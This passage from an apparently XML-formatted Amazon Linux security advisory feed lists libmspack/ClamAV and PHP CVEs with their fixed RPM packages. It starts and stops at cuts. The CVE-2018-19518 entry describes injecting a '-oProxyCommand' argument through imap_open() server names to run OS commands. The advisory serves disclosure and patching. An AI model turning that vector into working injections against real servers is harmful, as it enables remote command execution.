CVE-2018-14682 libmspack: off-by-one error in the TOLOWER() macro for CHM decompression
CVE-2018-14681:
An issue was discovered in kwajd_read_headers in mspack/kwajd.c in libmspack before 0.7alpha. Bad KWAJ file header extensions could cause a one or two byte overwrite.
1610896:
CVE-2018-14681 libmspack: out-of-bounds write in kwajd_read_headers in mspack/kwajd.c
CVE-2018-14680:
An issue was discovered in mspack/chmd.c in libmspack before 0.7alpha. It does not reject blank CHM filenames.
1610934:
CVE-2018-14680 libmspack: off-by-one error in the CHM chunk number validity checks
CVE-2018-14679:
An issue was discovered in mspack/chmd.c in libmspack before 0.7alpha. There is an off-by-one error in the CHM PMGI/PMGL chunk number validity checks, which could lead to denial of service (uninitialized data dereference and application crash).
1610890:
CVE-2018-14679 libmspack: off-by-one error in the CHM PMGI/PMGL chunk number validity checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14679" title="" id="CVE-2018-14679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14680" title="" id="CVE-2018-14680" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14681" title="" id="CVE-2018-14681" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14682" title="" id="CVE-2018-14682" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15378" title="" id="CVE-2018-15378" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-lib" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.100.2" release="2.35.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.100.2-2.35.amzn1.noarch.rpm</filename></package><package name="clamav-debuginfo" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.100.2" release="2.35.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.100.2-2.35.amzn1.noarch.rpm</filename></package><package name="clamav-lib" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamd" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.100.2-2.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1147</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1147: medium priority package update for php56 php70 php71 php72</title><issued date="2019-01-09 22:58:00" /><updated date="2019-01-12 03:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-19935:
ext/imap/php_imap.c in PHP 5.x and 7.x before 7.3.0 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty string in the message argument to the imap_mail function.
1660525:
CVE-2018-19935 php: NULL pointer dereference in ext/imap/php_imap.c resulting in a denial of service
CVE-2018-19518:
University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a &quot;-oProxyCommand&quot; argument.
1654228:
CVE-2018-19518 php: imap_open() allows running arbitrary shell commands via mailbox parameter
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19518" title="" id="CVE-2018-19518" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19935" title="" id="CVE-2018-19935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-gd" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.25" release="1.35.amzn1" epoch="0" 